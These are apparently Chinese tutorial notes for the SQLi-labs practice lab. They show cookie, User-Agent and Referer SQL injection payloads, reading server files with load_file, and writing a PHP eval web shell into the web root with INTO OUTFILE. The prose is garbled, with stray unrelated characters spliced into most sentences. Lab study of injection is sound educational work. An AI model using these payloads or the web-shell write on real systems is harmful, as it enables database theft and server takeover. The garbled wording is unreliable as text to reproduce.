寬字節(jié)注入
Cookie注入
? ? 使用靶場SQLi-labs 第20關(guān)字支;
? ? cookie注入的注入?yún)?shù)需要通過cookie提交,可以通過【document.cookie】在控制臺完成對瀏覽器cookie的讀寫砍艾。
? ? 方法一码耐、在控制臺輸入:
? ? document.cookie="uname=Dumb' and extractvalue(1,concat(0x5e,version(),0x5e))#"
? ? 方法二、通過bp抓包
? ? 在使用dump用戶登錄前后檀夹,分別使用bp進(jìn)行抓包筋粗,經(jīng)過對兩個(gè)數(shù)據(jù)包的對比,分析出登錄用戶后出現(xiàn)cookie字段炸渡,經(jīng)過對cookie字段中uname=Dumb進(jìn)行注入娜亿,發(fā)現(xiàn)可以進(jìn)行報(bào)錯(cuò)注入。
? ? uname=dumb' and updatexml(1,concat(0x5e,(select version(),0x5e)),1)
http頭部注入
? ? http頭部注入就是指注入http頭部報(bào)文字段蚌堵,這些字段通常有user-agent买决、referer等。
? ? @? ? user-agent注入
? ? 如第18關(guān)
? ? user-agent:hacker' and updatexml(1,concat(0x5e,database(),0x5e),1) and '1'='1
? ? @? ? referer注入
? ? 第19關(guān)吼畏,注入字段referer
? ??hacker' and updatexml(1,concat(0x5e,database(),0x5e),1) and '1'='1
secure-file-priv注入
@前提
? ? 我們可以利用SQL注入漏洞讀寫文件督赤,但是讀寫文件需要一定的條件。
? ?1泻蚊、secure-file-priv
? ? 可以再phpmyadmin中看到該變量躲舌。
? ? 該參數(shù)再高版本的mysql數(shù)據(jù)庫中限制了文件的導(dǎo)入導(dǎo)出操做。改變該參數(shù)可以再my.ini配置文件中修改性雄,然后重啟mysql服務(wù)没卸。
? ? 關(guān)于該參數(shù)值得相關(guān)說明
? ? secure-file-priv=空? ? ? ? 不對mysql服務(wù)的導(dǎo)入導(dǎo)出做出限制
? ? secure-file-priv='c:/a/'? ? 限制mysql服務(wù)的導(dǎo)入導(dǎo)出操做發(fā)生在c:/a/下(子目錄有效)
? ? secure-file-priv=null? ? ? ? 限制mysql服務(wù)不允許導(dǎo)入導(dǎo)出操做
? ? 2、當(dāng)前用戶具有文件權(quán)限
? ? 查詢語句:select File_priv from mysql.user where user="root" and host="localhost"
? ? 3秒旋、要知道寫入目標(biāo)文件的絕對路徑
? ? @讀取文件
? ? ?id=-1' union select 1,load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'),3 --+
? ? @寫入文件
? ? ?id=1' and 1=2 union select 1,'<?php @eval($_REQUEST[111]);?>',3 into outfile 'c:\\phpstudy\\www\\1.php' --+
? ? 直接傳入?yún)?shù)约计,頁面如果不報(bào)錯(cuò)說明寫入成功,可以直接訪問寫入文件